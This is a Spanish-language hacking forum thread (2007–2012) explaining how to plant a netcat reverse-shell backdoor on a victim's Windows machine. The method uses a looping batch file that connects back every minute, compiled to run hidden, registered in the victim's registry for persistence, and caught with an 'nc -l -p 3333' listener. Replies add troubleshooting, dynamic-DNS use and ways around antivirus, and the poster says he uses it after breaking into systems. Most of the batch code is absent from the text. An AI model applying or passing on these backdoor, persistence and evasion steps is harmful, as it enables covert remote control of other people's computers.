Título: Backdoor reverse shell con netcat Publicado por: skilled en 1 Enero 2007, 23:04 pm Bueno posteo mi forma de dejar un backdoor reverse shell:
Creo el siguiente bat: Código: @echo off Si ejecuto el siguiente bat intentara la conexion a x.x.x.x aproximadamente cada minuto creando un bucle infinito. (Podemos quitar la linea del ping para que intente la conexion infinitamente). El problema de la ejecución de este backdoor es el cuadro de dialogo de secuencia de comandos. Para poder ocultarlo compilamos el bat con quick batch file compiler triando la opcion ghost application para que oculte el cuadro. Finalmente añadimos el exe en el registro de la victima y con tansolo poner en nuestra shell: nc -vv -l -p 3333 obtendremos su shell, y si cerramos la conexion la podremos volver a obtener del mismo metodo. Nose si alguien ya utilizo este metodo.. yo solo he visto utilizar backdoors revere shell con comandos at. Bueno espero que sirva igual. Título: Re: Backdoor reverse shell con netcat Publicado por: octalh en 1 Enero 2007, 23:10 pm muy util gracias por la info
salu2 Título: Re: Backdoor reverse shell con netcat Publicado por: RevangelyonX en 2 Enero 2007, 01:13 am Creo que es importante decir, que el bat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error, ya que no podrá ejecutar Nc al no encontrar Netcat.
Para que sea compresible, si creamos un bat simple ::No pongamos el @echo off echo hola pause exit veremos que, al abrirlo, estaremos en la ruta %userprofile%\escritorio> Con lo cual, o ponemos en bat en la misma carpeta que el nc, o en el bat podemos hacer un: cd \ cd nc ::por ejemplo Pero si no, la idea está muy bien! ;) Un saludo! Título: Re: Backdoor reverse shell con netcat Publicado por: skilled en 2 Enero 2007, 01:23 am Primero gracias por postear
Citar bat debe estar en la misma ruta del NC de la victima para que funcione, si no saltará un error Esto es un backdoor, supuestamente hemos obtenido el control del sistema (o no...) y queremos dejar una puerta trasera. Nc lo mejor es meterlo en system32 si no: Código: @echo off Saludos Título: Re: Backdoor reverse shell con netcat Publicado por: octalh en 2 Enero 2007, 03:59 am lo e probado y funciona bastante bien, la manera de hacer el "timer" para el bucle me parece muy ingeniosa XD mira que usar un ping es algo muy original.
salu2 y gracias por compartirlo Título: Re: Backdoor reverse shell con netcat Publicado por: rakax en 2 Enero 2007, 04:21 am Y esto serviria si e vez de mi IP pongo la cuenta de NO-IP? es k tengo IP dinamica.
Gracias Título: Re: Backdoor reverse shell con netcat Publicado por: Zinc en 2 Enero 2007, 08:26 am Seria lo mismo..
Saludos!! Título: Re: Backdoor reverse shell con netcat Publicado por: rakax en 2 Enero 2007, 09:02 am Quien me explica lo k me pasa,aveces cuando corro un programa en CMD me sale acceso denegado,tengo permisos de administrador,no tengo antivirus ni firewall mal configurado.Hace tiempo k me pasa pero ya no lo aguanto grrr.
Gracias P.D:Adjunto el codigo para k vean k esta bien,el nc esta en system32 Código: :svr Título: Re: Backdoor reverse shell con netcat Publicado por: skilled en 2 Enero 2007, 12:32 pm Prueva de ponerlo en otra carpeta que no sea system32, si te funciona seguramente seran los permisos. Mira las cuentas que tienes y asegurate que eres admin.
Si no te funciona asegurate de no tener ningun tipo de programa antivirus. Haz un net start y mira que no tengas ningun antivirus o programa parecido, y mira los procesos. Citar no tengo antivirus Si no es nada de esto pillate un antivirus y haz un repasso a tu disco. Saludos Título: Re: Backdoor reverse shell con netcat Publicado por: Codename!! en 2 Enero 2007, 21:01 pm hoy dia el nc es detectado enviale un sfx y veras como el panda le salta a la supuesta victima xdd
Título: Re: Backdoor reverse shell con netcat Publicado por: skilled en 2 Enero 2007, 22:16 pm Yo lo utilizo como backdoor tras la penetracion, ya me encargo de que el antivirus no lo detecte. Aun asi no creas que muchos antivirus lo detecten.. con mas de uno no ha echo falta ni desactivarlo.
Título: Re: Backdoor reverse shell con netcat Publicado por: rakax en 3 Enero 2007, 07:36 am La verdad es k tengo todos los permisos y pase un anti vir y nada,esto es raro por k antes no pasaba
Saludos Título: Re: Backdoor reverse shell con netcat Publicado por: Kase en 15 Enero 2007, 04:13 am pero eske el nc. es detectado por los antivrus mas buenos.. kasprsky nod32, panda, bla bla bla... podra ser que muchos otros ni encuenta. pero seciyamente ay que resar que la otra tenga norton.. xD
Título: Re: Backdoor reverse shell con netcat Publicado por: _mÙëK§™_ en 15 Enero 2007, 18:36 pm pero eske el nc. es detectado por los antivrus mas buenos.. kasprsky nod32, panda, bla bla bla... podra ser que muchos otros ni encuenta. pero seciyamente ay que resar que la otra tenga norton.. xD Si, pero por ejem en nod-32 solo lo detecta cuando scaneas, cuando lo ejecutas no te tira alerta ;D Muy bune code, si tienes el nc en system 32 no te tira error ejecutes donde ejhecutes el bat. Título: Re: Backdoor reverse shell con netcat Publicado por: aporeg en 15 Enero 2012, 19:20 pm Hola
Es increíble que al día de hoy esto todavía funciona divinamente |